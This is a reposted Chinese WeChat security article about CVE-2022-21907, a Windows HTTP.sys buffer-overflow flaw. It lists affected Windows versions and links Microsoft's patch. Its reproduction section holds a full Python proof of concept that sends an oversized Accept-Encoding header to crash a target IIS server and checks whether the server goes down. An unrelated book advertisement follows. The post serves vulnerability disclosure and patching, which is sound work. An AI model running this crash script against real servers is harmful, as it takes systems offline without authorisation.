0x00 漏洞概述
HTTP协议堆栈中存在远程代码执行漏洞,由于HTTP协议栈(HTTP.sys)中的HTTP Trailer Support功能存在边界错误可导致缓冲区溢出。
未经身份验证的攻击者通过向Web服务器发送特制的HTTP数据包,触发缓冲区溢出,从而在目标系统上执行任意代码。该漏洞被微软提示为“可蠕虫化”,无需用户交互,便可通过网络进行自我传播。
CVSS评分为9.8
0x01 影响范围
Windows Server 2019 (Server Core installation)Windows Server 2019Windows 10 Version 21H2 for ARM64-based SystemsWindows 10 Version 21H2 for 32-bit SystemsWindows 11 for ARM64-based SystemsWindows 11 for x64-based SystemsWindows Server, version 20H2 (Server Core Installation)Windows 10 Version 20H2 for ARM64-based SystemsWindows 10 Version 20H2 for 32-bit SystemsWindows 10 Version 20H2 for x64-based SystemsWindows Server 2022 (Server Core installation)Windows Server 2022Windows 10 Version 21H1 for 32-bit SystemsWindows 10 Version 21H1 for ARM64-based SystemsWindows 10 Version 21H1 for x64-based SystemsWindows 10 Version 21H2 for x64-based SystemsWindows 10 Version 1809 for ARM64-based SystemsWindows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems
0x02 漏洞复现
#!/usr/bin/env python3# -*- coding: utf-8 -*-# File name : CVE-2022-21907_http.sys_crash.py# Author : Podalirius (@podalirius_)# Date created : 13 Jan 2022import argparseimport datetimeimport requestsimport timeimport threadingdef parseArgs():parser = argparse.ArgumentParser(description="Description message")parser.add_argument("-t", "--target", default=None, required=True, help='Target IIS Server.')parser.add_argument("-v", "--verbose", default=False, action="store_true", help='Verbose mode. (default: False)')return parser.parse_args()def monitor_thread(target, dtime=5):print('[>] Started monitoring of target server for the next %d seconds.' % dtime)for k in range(dtime):try:r = requests.get(target, timeout=1)except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e:print(" [%s] x1b[1;91mTarget is down!x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))else:print(" [%s] x1b[1;92mTarget is reachable!x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))time.sleep(1)if __name__ == '__main__':options = parseArgs()if not options.target.startswith('http://') and not options.target.startswith('https://'):target = "http://" + options.targetelse:target = options.targetpayload = 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'# Starting monitoring threadt = threading.Thread(target=monitor_thread, args=(target,))t.start()time.sleep(2)# Sending payloadprint(" [+] Sending payload ...")try:r = requests.get(target, headers={"Accept-Encoding": payload}, timeout=15)except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e:t.join()print("[%s] x1b[1;91mTarget successfully crashed!x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))# Cleanupt.join()
0x03 修复方案
官方已发布受影响版本的对应补丁,建议受影响的用户及时更新官方的安全补丁。链接如下:
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907
世间可曾存在着这样一个时空?那里高度自由,不会受到任何来自外界的干涉和干扰;那里无限可能,可凭个人喜好随性创造……
有的,就叫“元宇宙”!
元宇宙,可以满足不同人不同的期许,可以实现不同人不同的梦想,甚至可以容下世间所有截然不同的存在!心动吗?别急,在此之前,我们需要先明白“什么是元宇宙”,以及,“如何架构属于自己的元宇宙”——
北京大学出版社联合文津图书奖得主、全国十大科普教育平台“量子学派”与中国科学院院士,共同推出《元宇宙:图说元宇宙、设计元宇宙(全两册)》一书,不仅用场景化的叙事艺术带你轻松入门元宇宙,更有320幅手绘插图、十一维元宇宙关系图谱和大拉页版“2140世界设定”,助你直观地了解并且亲手架构独一无二的元宇宙!
元宇宙时代已缓缓开启,做好准备就启程吧!
扫描二维码获取
更多精彩
洛米唯熊
点个在看 你最好看
原文始发于微信公众号(洛米唯熊):HTTP协议栈远程代码执行漏洞(CVE-2022-21907)复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论